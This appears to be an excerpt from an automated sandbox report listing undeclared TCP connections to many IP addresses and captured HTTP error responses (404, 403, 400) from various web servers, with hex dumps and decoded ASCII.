            Source: unknownTCP traffic detected without corresponding DNS query: 32.191.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 101.134.148.111
            Source: unknownTCP traffic detected without corresponding DNS query: 190.218.2.237
            Source: unknownTCP traffic detected without corresponding DNS query: 179.152.150.23
            Source: unknownTCP traffic detected without corresponding DNS query: 181.96.99.70
            Source: unknownTCP traffic detected without corresponding DNS query: 221.171.49.53
            Source: unknownTCP traffic detected without corresponding DNS query: 20.206.189.65
            Source: unknownTCP traffic detected without corresponding DNS query: 167.225.184.19
            Source: unknownTCP traffic detected without corresponding DNS query: 39.108.234.201
            Source: unknownTCP traffic detected without corresponding DNS query: 92.142.213.147
            Source: unknownTCP traffic detected without corresponding DNS query: 105.25.164.152
            Source: unknownTCP traffic detected without corresponding DNS query: 171.56.218.147
            Source: unknownTCP traffic detected without corresponding DNS query: 201.164.93.35
            Source: unknownTCP traffic detected without corresponding DNS query: 51.68.12.48
            Source: unknownTCP traffic detected without corresponding DNS query: 116.177.176.181
            Source: unknownTCP traffic detected without corresponding DNS query: 137.185.234.82
            Source: unknownTCP traffic detected without corresponding DNS query: 97.87.209.125
            Source: unknownTCP traffic detected without corresponding DNS query: 124.201.113.98
            Source: unknownTCP traffic detected without corresponding DNS query: 223.135.170.20
            Source: unknownTCP traffic detected without corresponding DNS query: 96.230.43.72
            Source: unknownTCP traffic detected without corresponding DNS query: 109.182.249.172
            Source: unknownTCP traffic detected without corresponding DNS query: 77.20.100.37
            Source: unknownTCP traffic detected without corresponding DNS query: 200.147.143.170
            Source: unknownTCP traffic detected without corresponding DNS query: 96.228.215.199
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:56:39 GMTServer: Apache/2.4.38 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 36 3a 33 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6d 6e 63 2e 70 69 70 73 2e 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:56:39 GMTServer: Apache/2.4.38 (Ubuntu)Content-Length: 303Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ExpressAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, AcceptAccess-Control-Allow-Methods: PUT, POST, GET, DELETE, OPTIONSContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffDate: Sun, 23 Oct 2022 15:56:38 GMTContent-Length: 1259Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 63 68 69 65 72 20 6f 75 20 72 e9 70 65 72 74 6f 69 72 65 20 69 6e 74 72 6f 75 76 61 62 6c 65 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 23 Oct 2022 15:56:39 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlX-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 15:56:09 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Length: 345Date: Sun, 23 Oct 2022 15:56:24 GMTServer: lighttpd/1.4.47Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 2d 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 33 20 2d 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>403 - Forbidden</title> </head> <body> <h1>403 - Forbidden</h1> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 15:56:40 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 18:56:38 GMTServer: webX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 17:56:42 GMTServer: WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99X-FRAME-OPTIONS: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 15:56:42 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
